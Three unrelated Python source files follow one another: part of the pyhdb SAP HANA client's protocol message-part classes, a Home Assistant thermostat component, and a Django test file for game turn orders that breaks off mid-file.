header_struct = struct.Struct('<bbhiii') # 16 bytes
header_size = header_struct.size
attribute = 0
kind = None
bigargumentcount = 0 # what is this useful for? Seems to be always zero ...
header = None
trace_header = trace_payload = ''
# Attribute to get source of part
source = 'client'
__tracing_attrs__ = ['header', 'trace_header', 'trace_payload']
def pack(self, remaining_size):
"""Pack data of part into binary format"""
arguments_count, payload = self.pack_data(remaining_size - self.header_size)
payload_length = len(payload)
# align payload length to multiple of 8
if payload_length % 8 != 0:
payload += b"\x00" * (8 - payload_length % 8)
self.header = PartHeader(self.kind, self.attribute, arguments_count, self.bigargumentcount,
payload_length, remaining_size)
hdr = self.header_struct.pack(*self.header)
if pyhdb.tracing:
self.trace_header = humanhexlify(hdr, 30)
self.trace_payload = humanhexlify(payload, 30)
return hdr + payload
def pack_data(self, remaining_size):
raise NotImplemented()
@classmethod
def unpack_from(cls, payload, expected_parts):
"""Unpack parts from payload"""
for num_part in iter_range(expected_parts):
hdr = payload.read(cls.header_size)
try:
part_header = PartHeader(*cls.header_struct.unpack(hdr))
except struct.error:
raise InterfaceError("No valid part header")
if part_header.payload_size % 8 != 0:
part_payload_size = part_header.payload_size + 8 - (part_header.payload_size % 8)
else:
part_payload_size = part_header.payload_size
pl = payload.read(part_payload_size)
part_payload = io.BytesIO(pl)
try:
_PartClass = PART_MAPPING[part_header.part_kind]
except KeyError:
raise InterfaceError("Unknown part kind %s" % part_header.part_kind)
debug('%s (%d/%d): %s', _PartClass.__name__, num_part+1, expected_parts, str(part_header))
debug('Read %d bytes payload for part %d', part_payload_size, num_part + 1)
init_arguments = _PartClass.unpack_data(part_header.argument_count, part_payload)
debug('Part data: %s', init_arguments)
part = _PartClass(*init_arguments)
part.header = part_header
part.attribute = part_header.part_attributes
part.source = 'server'
if pyhdb.tracing:
part.trace_header = humanhexlify(hdr[:part_header.payload_size])
part.trace_payload = humanhexlify(pl, 30)
yield part
class Command(Part):
"""
This part contains the text of an SQL command.
The text is encoded in CESU-8.
"""
kind = constants.part_kinds.COMMAND
__tracing_attrs__ = Part.__tracing_attrs__ + ['sql_statement']
def __init__(self, sql_statement):
self.sql_statement = sql_statement
def pack_data(self, remaining_size):
payload = self.sql_statement.encode('cesu-8')
return 1, payload
@classmethod
def unpack_data(cls, argument_count, payload):
sql_statement = payload.read()
return sql_statement.decode('cesu-8')
class ResultSet(Part):
"""
This part contains the raw result data but without
structure informations the unpacking is not possible. In a
later step we will unpack the data.
"""
kind = constants.part_kinds.RESULTSET
__tracing_attrs__ = Part.__tracing_attrs__ + ['num_rows']
def __init__(self, payload, num_rows):
self.payload = payload
self.num_rows = num_rows
@classmethod
def unpack_data(cls, argument_count, payload):
return payload, argument_count
def unpack_rows(self, column_types, connection):
"""Unpack rows for data (from a select statement) from payload and yield a single row at a time.
:param column_types: a tuple of column descriptors
e.g. (<class 'pyhdb.protocol.types.String'>, <class 'pyhdb.protocol.types.ClobType'>)
:param connection: a db connection object
:returns: a generator object
"""
for _ in iter_range(self.num_rows):
yield tuple(typ.from_resultset(self.payload, connection) for typ in column_types)
class OutputParameters(Part):
"""
This part contains the raw result data but without
structure informations the unpacking is not possible. In a
later step we will unpack the data.
"""
kind = constants.part_kinds.OUTPUTPARAMETERS
__tracing_attrs__ = Part.__tracing_attrs__ + ['num_rows']
def __init__(self, payload, num_rows):
self.payload = payload
self.num_rows = num_rows
@classmethod
def unpack_data(cls, argument_count, payload):
return payload, argument_count
def unpack_rows(self, parameters_metadata, connection):
"""Unpack output or input/output parameters from the stored procedure call result
:parameters_metadata: a stored procedure parameters metadata
:returns: parameter values
"""
values = []
for param in parameters_metadata:
# Unpack OUT or INOUT parameters' values
if param.iotype != parameter_direction.IN:
values.append( by_type_code[param.datatype].from_resultset(self.payload) )
yield tuple(values)
class Error(Part):
kind = constants.part_kinds.ERROR
part_struct = struct.Struct("iIIB5s")
__tracing_attrs__ = Part.__tracing_attrs__ + ['errors']
def __init__(self, errors):
self.errors = errors
@classmethod
def unpack_data(cls, argument_count, payload):
errors = []
for _ in iter_range(argument_count):
code, position, textlength, level, sqlstate = cls.part_struct.unpack(payload.read(cls.part_struct.size))
errortext = payload.read(textlength).decode('utf-8')
if code == 301:
# Unique constraint violated
errors.append(IntegrityError(errortext, code))
else:
errors.append(DatabaseError(errortext, code))
return tuple(errors),
class StatementId(Part):
kind = constants.part_kinds.STATEMENTID
__tracing_attrs__ = Part.__tracing_attrs__ + ['statement_id']
def __init__(self, statement_id):
self.statement_id = statement_id
def pack_data(self, remaining_size):
payload = bytearray(self.statement_id)
return 1, payload
@classmethod
def unpack_data(cls, argument_count, payload):
return payload.read(8),
class RowsAffected(Part):
kind = constants.part_kinds.ROWSAFFECTED
__tracing_attrs__ = Part.__tracing_attrs__ + ['values']
def __init__(self, values):
self.values = values
@classmethod
def unpack_data(cls, argument_count, payload):
values = []
for _ in iter_range(argument_count):
values.append(struct.unpack("<i", payload.read(4))[0])
return tuple(values),
class ResultSetId(Part):
"""
This part contains the identifier of a result set.
"""
kind = constants.part_kinds.RESULTSETID
__tracing_attrs__ = Part.__tracing_attrs__ + ['value']
def __init__(self, value):
self.value = value
def pack_data(self, remaining_size):
return 1, self.value
@classmethod
def unpack_data(cls, argument_count, payload):
value = payload.read()
return value,
class TopologyInformation(Part):
kind = constants.part_kinds.TOPOLOGYINFORMATION
def __init__(self, *args):
pass
@classmethod
def unpack_data(cls, argument_count, payload):
# TODO
return tuple()
class ReadLobRequest(Part):
kind = constants.part_kinds.READLOBREQUEST
part_struct = struct.Struct(b'<8sQI4s')
__tracing_attrs__ = Part.__tracing_attrs__ + ['locator_id', 'readoffset', 'readlength']
def __init__(self, locator_id, readoffset, readlength):
self.locator_id = locator_id
self.readoffset = readoffset
self.readlength = readlength
def pack_data(self, remaining_size):
"""Pack data. readoffset has to be increased by one, seems like HANA starts from 1, not zero."""
payload = self.part_struct.pack(self.locator_id, self.readoffset + 1, self.readlength, b' ')
return 4, payload
class ReadLobReply(Part):
kind = constants.part_kinds.READLOBREPLY
part_struct_p1 = struct.Struct(b'<8sB')
part_struct_p2 = struct.Struct(b'<I3s')
__tracing_attrs__ = Part.__tracing_attrs__ + ['is_data_included', 'is_last_data', 'is_null']
def __init__(self, data, is_data_included, is_last_data, is_null):
self.data = data
self.is_data_included = is_data_included
self.is_last_data = is_last_data
self.is_null = is_null
@classmethod
def unpack_data(cls, argument_count, payload):
locator_id, options = cls.part_struct_p1.unpack(payload.read(cls.part_struct_p1.size))
is_null = bool(options & ReadLobHeader.LOB_OPTION_ISNULL)
if is_null:
# returned LOB is NULL
lobdata = is_data_included = is_last_data = None
is_null = True
else:
chunklength, filler = cls.part_struct_p2.unpack(payload.read(cls.part_struct_p2.size))
is_data_included = bool(options & ReadLobHeader.LOB_OPTION_DATAINCLUDED)
if is_data_included:
lobdata = payload.read()
else:
lobdata = ''
is_last_data = bool(options & ReadLobHeader.LOB_OPTION_LASTDATA)
assert len(lobdata) == chunklength
return lobdata, is_data_included, is_last_data, is_null
class WriteLobRequest(Part):
"""Write/Send LOB data to server"""
kind = constants.part_kinds.WRITELOBREQUEST
part_struct = struct.Struct(b'<8sBQI') # B[8] I1 I8 I4
__tracing_attrs__ = Part.__tracing_attrs__ + ['lob_buffers']
def __init__(self, lob_buffers):
"""
:param lob_buffers: a deque containing lob buffers to put into lob write requests
"""
self.lob_buffers = lob_buffers
assert lob_buffers, 'List of lob buffers must include at least one lob'
# noinspection PyUnboundLocalVariable
def pack_data(self, max_payload_size):
offset = 0 # a value of zero means: append lob data to existing LOB data in DB
num_lobs = 0
max_payload_size -= self.part_struct.size # reduce by struct header size to simply math below
payload = io.BytesIO()
while payload.tell() < max_payload_size and self.lob_buffers:
lb = self.lob_buffers.popleft()
remaining_payload_size = max_payload_size - payload.tell()
num_bytes_to_write = min(lb.num_bytes_to_write, remaining_payload_size)
lob_options = WriteLobHeader.LOB_OPTION_DATAINCLUDED
if num_bytes_to_write == lb.num_bytes_to_write:
# i.e. the entire (rest of the) LOB will be written, so set LASTDATA flag:
lob_options |= WriteLobHeader.LOB_OPTION_LASTDATA
payload.write(self.part_struct.pack(lb.locator_id, lob_options, offset, num_bytes_to_write))
payload.write(lb.encoded_data.read(num_bytes_to_write))
num_lobs += 1
# Since loop above was run at least once both 'lob_options' and 'lb' will be defined
if not lob_options & WriteLobHeader.LOB_OPTION_LASTDATA:
# last lob object was not written entirely -> put it back into lob_buffers for next round of writing:
self.lob_buffers.appendleft(lb)
return num_lobs, payload.getvalue()
class WriteLobReply(Part):
"""This part is received from HAHA after inserting a partial LOB through an insert or select statement"""
kind = constants.part_kinds.WRITELOBREPLY
part_struct = struct.Struct(b'<8sQI4s')
__tracing_attrs__ = Part.__tracing_attrs__ + ['locator_ids']
def __init__(self, locator_ids):
self.locator_ids = locator_ids
@classmethod
def unpack_data(cls, argument_count, payload):
"""Unpack payload by splitting up the raw payload into list of locator_ids
:param argument_count: number of locator_ids in payload is equal to argument_count
:param payload: BytesIO instance with list of concatenated locator_ids, where each locator_id is 8 bytes long
"""
pl = payload.read()
locator_ids = [pl[start:start+8] for start in range(0, len(pl), 8)]
return locator_ids,
class LobBuffer(object):
def __init__(self, orig_data, DataType, lob_header_pos):
self.orig_data = orig_data
# Lob data can be either an instance of a Lob-class, or a string/unicode object, Encode properly:
if isinstance(orig_data, byte_type):
enc_data = orig_data
elif isinstance(orig_data, string_types):
enc_data = DataType.encode_value(orig_data)
else:
# assume a LOB instance:
enc_data = orig_data.encode()
self.encoded_data = io.BytesIO(enc_data)
self.DataType = DataType
self.lob_header_pos = lob_header_pos
self.encoded_lob_size = len(enc_data)
self.locator_id = None
@property
def num_bytes_to_write(self):
"""Return number of bytes of lobs which still have to be written"""
return self.encoded_lob_size - self.encoded_data.tell()
class Parameters(Part):
"""Prepared statement parameters' data """
kind = constants.part_kinds.PARAMETERS
__tracing_attrs__ = Part.__tracing_attrs__ + ['parameters']
def __init__(self, parameters):
"""Initialize parameter part
:param parameters: A generator producing lists (1 per row) of named tuples containing parameter meta
data and values (usually an instance of class 'cursor.PreparedStatement')
Example: [Parameter(id=0, datatype=9, length=255, value='row2'), Parameter(id=1, ...), ]
:returns: tuple (arguments_count, payload)
"""
self.parameters = parameters
self.unwritten_lobs = []
def pack_data(self, remaining_size):
payload = io.BytesIO()
num_rows = 0
for row_parameters in self.parameters:
# Loop over all input row parameters.
# Memorize start position of row in buffer if it has to be removed in case that
# the maximum message size will be exceeded (see below)
row_header_start_pos = payload.tell()
row_lobs = []
row_lob_size_sum = 0
for parameter in row_parameters:
# 'parameter' is a named tuple, created in PreparedStatement.prepare_parameters()
type_code, value = parameter.type_code, parameter.value
try:
_DataType = types.by_type_code[type_code]
except KeyError:
raise InterfaceError("Prepared statement parameter datatype not supported: %d" % type_code)
if value is None:
pfield = types.NoneType.prepare(type_code)
elif type_code in types.String.type_code:
pfield = _DataType.prepare(value, type_code)
else:
pfield = _DataType.prepare(value)
if type_code in (types.BlobType.type_code, types.ClobType.type_code, types.NClobType.type_code):
# In case of value being a lob its actual data is not yet included in 'pfield' generated above.
# Instead the lob data needs to be appended at the end of the packed row data.
# Memorize the position of the lob header data (the 'pfield'):
lob_header_pos = payload.tell()
lob_buffer = LobBuffer(value, _DataType, lob_header_pos)
# Add length of lob data to the sum so we can see whether all data fits into a segment below:
row_lob_size_sum += lob_buffer.encoded_lob_size
# Append lob data so it can be appended once all data for the row is packed:
row_lobs.append(lob_buffer)
payload.write(pfield)
if payload.tell() >= remaining_size:
# Last row (even without lobs) does not fit anymore into the current message! Remove it from payload
# by resetting payload pointer to former position and truncate away last row data:
payload.seek(row_header_start_pos)
payload.truncate()
self.parameters.back() # make generator to go one step back, so same item will be delivered again
# Check for case that a row does not fit at all into a part block (i.e. it is the first one):
if num_rows == 0:
raise DataError('Parameter row too large to fit into execute statement.'
'Got: %d bytes, allowed: %d bytes' %
(payload.tell() + row_lob_size_sum, remaining_size))
break # jump out of loop - no more rows to be added!
else:
# Keep row data.
num_rows += 1
# Now append as much as possible of actual binary lob data after the end of all parameters of this row.
# All those LOBs which were not or only partially written to the payload will be collected in
# 'unwritten_lobs' for further LOBWRITEREQUESTs.
self.unwritten_lobs = self.pack_lob_data(remaining_size, payload, row_header_start_pos, row_lobs)
if payload.tell() >= remaining_size:
# all the rest of the segment is filled with lob data, no more rows can be added:
break
return num_rows, payload.getvalue()
@staticmethod
def pack_lob_data(remaining_size, payload, row_header_start_pos, row_lobs):
"""
After parameter row has been written, append the lobs and update the corresponding lob headers
with lob position and lob size:
:param payload: payload object (io.BytesIO instance)
:param row_header_start_pos: absolute position of start position of row within payload
:param row_lobs: list of row buffer instance (containing binary encoded lob data, header position and DataType)
"""
unwritten_lobs = collections.deque()
for lob_buffer in row_lobs:
# Calculate relative position of lob within the binary packed parameter row.
# Add +1, Hana counts from 1, not 0!
rel_lob_pos = payload.tell() - row_header_start_pos + 1
# Calculate how much space is left in message for lob data:
max_data_to_write = min(lob_buffer.encoded_lob_size, remaining_size - payload.tell())
payload.write(lob_buffer.encoded_data.read(max_data_to_write))
is_last_data = max_data_to_write == lob_buffer.encoded_lob_size
if not is_last_data:
# lob has not been written (partially or entirely) into message -> register for further write requests
unwritten_lobs.append(lob_buffer)
# Write position and size of lob data into lob header block:
payload.seek(lob_buffer.lob_header_pos)
payload.write(lob_buffer.DataType.prepare(None, length=max_data_to_write,
position=rel_lob_pos, is_last_data=is_last_data))
# Set pointer back to end for further writing
payload.seek(0, SEEK_END)
return unwritten_lobs
class Authentication(Part):
kind = constants.part_kinds.AUTHENTICATION
__tracing_attrs__ = Part.__tracing_attrs__ + ['user', 'methods']
def __init__(self, user, methods):
self.user = user
self.methods = methods
def pack_data(self, remaining_size):
# Flat dict of methods
fields = [self.user]
for method_data in self.methods.items():
fields = fields + list(method_data)
payload = Fields.pack_data(fields)
return 1, payload
@classmethod
def unpack_data(cls, argument_count, payload):
fields = Fields.unpack_data(payload)
methods = dict(zip(fields[0::2], fields[1::2]))
return None, methods
class ClientId(Part):
# Part not documented.
kind = constants.part_kinds.CLIENTID
__tracing_attrs__ = Part.__tracing_attrs__ + ['client_id']
def __init__(self, client_id):
self.client_id = client_id
def pack_data(self, remaining_size):
payload = self.client_id.encode('utf-8')
return 1, payload
@classmethod
def unpack_data(cls, argument_count, payload):
client_id = payload.read(2048)
return client_id.decode('utf-8')
class StatementContext(Part):
kind = constants.part_kinds.STATEMENTCONTEXT
def __init__(self, *args):
pass
@classmethod
def unpack_data(cls, argument_count, payload):
return tuple()
class FetchSize(Part):
kind = constants.part_kinds.FETCHSIZE
struct = struct.Struct('i')
__tracing_attrs__ = Part.__tracing_attrs__ + ['size']
def __init__(self, size):
self.size = size
def pack_data(self, remaining_size):
return 1, self.struct.pack(self.size)
@classmethod
def unpack_data(cls, argument_count, payload):
return cls.struct.unpack(payload.read())
class ParameterMetadata(Part):
kind = constants.part_kinds.PARAMETERMETADATA
__tracing_attrs__ = Part.__tracing_attrs__ + ['values']
def __init__(self, values):
self.values = values
@classmethod
def unpack_data(cls, argument_count, payload):
values = []
param_md_tuple = namedtuple('ParameterMetadata', 'mode datatype iotype id length fraction')
text_offset = 16 * argument_count
# read parameter metadata
for i in iter_range(argument_count):
mode, datatype, iotype, filler1, name_offset, length, fraction, filler2 = \
struct.unpack("bbbbIhhI", payload.read(16))
param_metadata = param_md_tuple(mode, datatype, iotype, name_offset, length, fraction)
if name_offset == 0xffffffff:
# param id is parameter position
param_id = i
else:
# read parameter name
current_pos = payload.tell()
payload.seek(text_offset + name_offset)
length = ord(payload.read(1))
param_id = payload.read(length).decode('utf-8')
payload.seek(current_pos)
values.append(param_md_tuple(mode, datatype, iotype, param_id, length, fraction))
return tuple(values),
class ResultSetMetaData(Part):
kind = constants.part_kinds.RESULTSETMETADATA
__tracing_attrs__ = Part.__tracing_attrs__ + ['columns']
def __init__(self, columns):
self.columns = columns
@classmethod
def unpack_data(cls, argument_count, payload):
columns = []
for _ in iter_range(argument_count):
meta = list(struct.unpack('bbhhhIIII', payload.read(24)))
columns.append(meta)
content_start = payload.tell()
for column in columns:
for i in iter_range(5, 9):
if column[i] == 4294967295:
column[i] = None
continue
payload.seek(content_start+column[i], 0)
length, = struct.unpack('B', payload.read(1))
column[i] = payload.read(length).decode('utf-8')
columns = tuple([tuple(x) for x in columns])
return columns,
class OptionPartMeta(PartMeta):
def __new__(mcs, name, bases, attrs):
part_class = super(OptionPartMeta, mcs).__new__(
mcs, name, bases, attrs
)
if hasattr(part_class, "option_definition"):
part_class.option_identifier = dict([
(i[1][0], i[0]) for i in part_class.option_definition.items()
])
return part_class
class OptionPart(with_metaclass(OptionPartMeta, Part)):
"""
The multi-line option part format is a common format to
transmit collections of options (typed key-value pairs).
"""
__metaclass__ = OptionPartMeta
def __init__(self, options):
self.options = options
def pack_data(self, remaining_size):
payload = b""
arguments = 0
for option, value in self.options.items():
try:
key, typ = self.option_definition[option]
except KeyError:
raise InterfaceError("Unknown option identifier %s" % option)
if value is None:
continue
if typ == 1:
value = struct.pack('B', value)
elif typ == 2:
value = struct.pack('h', value)
elif typ == 3:
value = struct.pack('i', value)
elif typ == 4:
value = struct.pack('q', value)
elif typ == 28:
value = struct.pack('?', value)
elif typ == 29 or typ == 30:
value = value.encode('utf-8')
value = struct.pack('h', len(value)) + value
else:
raise Exception("Unknown option type %s" % typ)
arguments += 1
payload += struct.pack('bb', key, typ) + value
return arguments, payload
@classmethod
def unpack_data(cls, argument_count, payload):
options = {}
for _ in iter_range(argument_count):
key, typ = struct.unpack('bb', payload.read(2))
if key not in cls.option_identifier:
key = 'Unknown_%d' % key
else:
key = cls.option_identifier[key]
if typ == 1:
value = struct.unpack('B', payload.read(1))[0]
elif typ == 2:
value = struct.unpack('h', payload.read(2))[0]
elif typ == 3:
value = struct.unpack('i', payload.read(4))[0]
elif typ == 4:
value = struct.unpack('q', payload.read(8))[0]
elif typ == 28:
value = struct.unpack('?', payload.read(1))[0]
elif typ == 29 or typ == 30:
length = struct.unpack('h', payload.read(2))[0]
value = payload.read(length).decode('utf-8')
elif typ == 24:
# TODO: Handle type 24
continue
else:
raise Exception("Unknown option type %s" % typ)
options[key] = value
return options,
class ConnectOptions(OptionPart):
kind = constants.part_kinds.CONNECTOPTIONS
option_definition = {
# Identifier, (Value, Type)
"connection_id": (1, 3),
"complete_array_execution": (2, 28),
"client_locale": (3, 29),
"supports_large_bulk_operations": (4, 28),
"large_number_of_parameters_support": (10, 28),
"system_id": (11, 29),
"data_format_version": (12, 3),
"select_for_update_supported": (14, 28),
"client_distribution_mode": (15, 3),
"engine_data_format_version": (16, 3),
"distribution_protocol_version": (17, 3),
"split_batch_commands": (18, 28),
"use_transaction_flags_only": (19, 28),
"row_and_column_optimized_format": (20, 28),
"ignore_unknown_parts": (21, 28),
"data_format_version2": (23, 3)
}
class TransactionFlags(OptionPart):
kind = constants.part_kinds.TRANSACTIONFLAGS
option_definition = {
# Identifier, (Value, Type)
"rolledback": (0, 28),
"commited": (1, 28),
"new_isolation_level": (2, 3),
"ddl_commit_mode_changed": (3, 28),
"write_transaction_started": (4, 28),
"no_write_transaction_started": (5, 28),
"session_closing_transaction_error": (6, 28)
}
| |
"""
homeassistant.components.thermostat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Provides functionality to interact with thermostats.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/thermostat/
"""
import logging
import os
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.config import load_yaml_config_file
import homeassistant.util as util
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.temperature import convert
from homeassistant.components import (ecobee, zwave)
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_TEMPERATURE, STATE_ON, STATE_OFF, STATE_UNKNOWN,
TEMP_CELCIUS)
DOMAIN = "thermostat"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = 60
SERVICE_SET_AWAY_MODE = "set_away_mode"
SERVICE_SET_TEMPERATURE = "set_temperature"
SERVICE_SET_FAN_MODE = "set_fan_mode"
STATE_HEAT = "heat"
STATE_COOL = "cool"
STATE_IDLE = "idle"
ATTR_CURRENT_TEMPERATURE = "current_temperature"
ATTR_AWAY_MODE = "away_mode"
ATTR_FAN = "fan"
ATTR_MAX_TEMP = "max_temp"
ATTR_MIN_TEMP = "min_temp"
ATTR_TEMPERATURE_LOW = "target_temp_low"
ATTR_TEMPERATURE_HIGH = "target_temp_high"
ATTR_OPERATION = "current_operation"
_LOGGER = logging.getLogger(__name__)
DISCOVERY_PLATFORMS = {
ecobee.DISCOVER_THERMOSTAT: 'ecobee',
zwave.DISCOVER_THERMOSTATS: 'zwave'
}
def set_away_mode(hass, away_mode, entity_id=None):
""" Turn all or specified thermostat away mode on. """
data = {
ATTR_AWAY_MODE: away_mode
}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_AWAY_MODE, data)
def set_temperature(hass, temperature, entity_id=None):
""" Set new target temperature. """
data = {ATTR_TEMPERATURE: temperature}
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_TEMPERATURE, data)
def set_fan_mode(hass, fan_mode, entity_id=None):
""" Turn all or specified thermostat fan mode on. """
data = {
ATTR_FAN: fan_mode
}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
hass.services.call(DOMAIN, SERVICE_SET_FAN_MODE, data)
# pylint: disable=too-many-branches
def setup(hass, config):
""" Setup thermostats. """
component = EntityComponent(_LOGGER, DOMAIN, hass,
SCAN_INTERVAL, DISCOVERY_PLATFORMS)
component.setup(config)
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def away_mode_set_service(service):
""" Set away mode on target thermostats """
target_thermostats = component.extract_from_service(service)
away_mode = service.data.get(ATTR_AWAY_MODE)
if away_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_AWAY_MODE, ATTR_AWAY_MODE)
return
for thermostat in target_thermostats:
if away_mode:
thermostat.turn_away_mode_on()
else:
thermostat.turn_away_mode_off()
thermostat.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_AWAY_MODE, away_mode_set_service,
descriptions.get(SERVICE_SET_AWAY_MODE))
def temperature_set_service(service):
""" Set temperature on the target thermostats """
target_thermostats = component.extract_from_service(service)
temperature = util.convert(
service.data.get(ATTR_TEMPERATURE), float)
if temperature is None:
return
for thermostat in target_thermostats:
thermostat.set_temperature(convert(
temperature, hass.config.temperature_unit,
thermostat.unit_of_measurement))
thermostat.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_TEMPERATURE, temperature_set_service,
descriptions.get(SERVICE_SET_TEMPERATURE))
def fan_mode_set_service(service):
""" Set fan mode on target thermostats """
target_thermostats = component.extract_from_service(service)
fan_mode = service.data.get(ATTR_FAN)
if fan_mode is None:
_LOGGER.error(
"Received call to %s without attribute %s",
SERVICE_SET_FAN_MODE, ATTR_FAN)
return
for thermostat in target_thermostats:
if fan_mode:
thermostat.turn_fan_on()
else:
thermostat.turn_fan_off()
thermostat.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_FAN_MODE, fan_mode_set_service,
descriptions.get(SERVICE_SET_FAN_MODE))
return True
class ThermostatDevice(Entity):
""" Represents a thermostat within Home Assistant. """
# pylint: disable=no-self-use
@property
def state(self):
""" Returns the current state. """
return self.target_temperature or STATE_UNKNOWN
@property
def state_attributes(self):
""" Returns optional state attributes. """
data = {
ATTR_CURRENT_TEMPERATURE:
self._convert(self.current_temperature, 1),
ATTR_MIN_TEMP: self._convert(self.min_temp, 1),
ATTR_MAX_TEMP: self._convert(self.max_temp, 1),
ATTR_TEMPERATURE: self._convert(self.target_temperature, 1),
ATTR_TEMPERATURE_LOW:
self._convert(self.target_temperature_low, 1),
ATTR_TEMPERATURE_HIGH:
self._convert(self.target_temperature_high, 1),
}
operation = self.operation
if operation is not None:
data[ATTR_OPERATION] = operation
is_away = self.is_away_mode_on
if is_away is not None:
data[ATTR_AWAY_MODE] = STATE_ON if is_away else STATE_OFF
is_fan_on = self.is_fan_on
if is_fan_on is not None:
data[ATTR_FAN] = STATE_ON if is_fan_on else STATE_OFF
return data
@property
def unit_of_measurement(self):
""" Unit of measurement this thermostat expresses itself in. """
raise NotImplementedError
@property
def current_temperature(self):
""" Returns the current temperature. """
raise NotImplementedError
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return None
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
raise NotImplementedError
@property
def target_temperature_low(self):
""" Returns the lower bound temperature we try to reach. """
return self.target_temperature
@property
def target_temperature_high(self):
""" Returns the upper bound temperature we try to reach. """
return self.target_temperature
@property
def is_away_mode_on(self):
"""
Returns if away mode is on.
Return None if no away mode available.
"""
return None
@property
def is_fan_on(self):
"""
Returns if the fan is on
Return None if not available.
"""
return None
def set_temperate(self, temperature):
""" Set new target temperature. """
pass
def turn_away_mode_on(self):
""" Turns away mode on. """
pass
def turn_away_mode_off(self):
""" Turns away mode off. """
pass
def turn_fan_on(self):
""" Turns fan on. """
pass
def turn_fan_off(self):
""" Turns fan off. """
pass
@property
def min_temp(self):
""" Return minimum temperature. """
return round(convert(7, TEMP_CELCIUS, self.unit_of_measurement))
@property
def max_temp(self):
""" Return maxmum temperature. """
return round(convert(35, TEMP_CELCIUS, self.unit_of_measurement))
def _convert(self, temp, round_dec=None):
""" Convert temperature from this thermost into user preferred
temperature. """
if temp is None:
return None
value = convert(temp, self.unit_of_measurement,
self.hass.config.temperature_unit)
return value if round_dec is None else round(value, round_dec)
| |
from django.test import TestCase
from django.utils import six
from .. import models
from . import factories
if six.PY2:
TestCase.assertCountEqual = six.assertCountEqual
class TurnTest(TestCase):
def setUp(self):
self.game = factories.GameFactory(state='S')
for x in range(7):
factories.GovernmentFactory(game=self.game)
self.assertTrue(self.game.activate())
def test_recent_orders_spring(self):
gvt = models.Government.objects.all()[0]
t = factories.TurnFactory(game=self.game, year=1900, season='SR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='paris.l', previous='burgundy.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='paris.l', action='M', target='gascony.l')
t = factories.TurnFactory(game=self.game, year=1900, season='F')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='gascony.l', previous='paris.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='gascony.l', action='M', target='marseilles.l')
t = factories.TurnFactory(game=self.game, year=1900, season='FR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='marseilles.l', previous='gascony.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='marseilles.l', action='M', target='piedmont.l')
t = factories.TurnFactory(game=self.game, year=1900, season='FA')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='B')
t = factories.TurnFactory(game=self.game, year=1901, season='S')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='M', target='picardy.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='piedmont.l', action='M', target='tuscany.l')
recent = t.recent_orders()
self.assertEqual(len(recent), 1)
power, orders = recent[0]
self.assertEqual(power, gvt.power_display)
self.assertEqual(len(orders), 2)
(actor1, orders1), (actor2, orders2) = orders
self.assertCountEqual([actor1, actor2], ['b.brest.l', 'gascony.l'])
orders = {actor1: orders1, actor2: orders2}
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['b.brest.l']],
[('FA', 1900)])
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['gascony.l']],
[('F', 1900), ('FR', 1900)])
def test_recent_orders_spring_retreat(self):
gvt = models.Government.objects.all()[0]
t = factories.TurnFactory(game=self.game, year=1900, season='FA')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='marseilles.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='B')
t = factories.TurnFactory(game=self.game, year=1901, season='S')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='piedmont.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='B',
actor='brest.l', action='M', target='picardy.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='piedmont.l', action='M', target='tuscany.l')
t = factories.TurnFactory(game=self.game, year=1901, season='SR')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='brest.l', previous='brest.l')
factories.UnitFactory(
turn=t, government=gvt, u_type='A',
subregion='tuscany.l', previous='piedmont.l')
factories.CanonicalOrderFactory(
turn=t, government=gvt, result='S',
actor='brest.l', action='M', target='paris.l')
recent = t.recent_orders()
self.assertEqual(len(recent), 1)
power, orders = recent[0]
self.assertEqual(power, gvt.power_display)
self.assertEqual(len(orders), 2)
(actor1, orders1), (actor2, orders2) = orders
self.assertCountEqual([actor1, actor2], ['brest.l', 'piedmont.l'])
orders = {actor1: orders1, actor2: orders2}
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['brest.l']],
[('S', 1901)])
self.assertEqual([(o.turn.season, o.turn.year) for o in orders['piedmont.l']],
[('S', 1901)])
def test_recent_orders_fall(self):
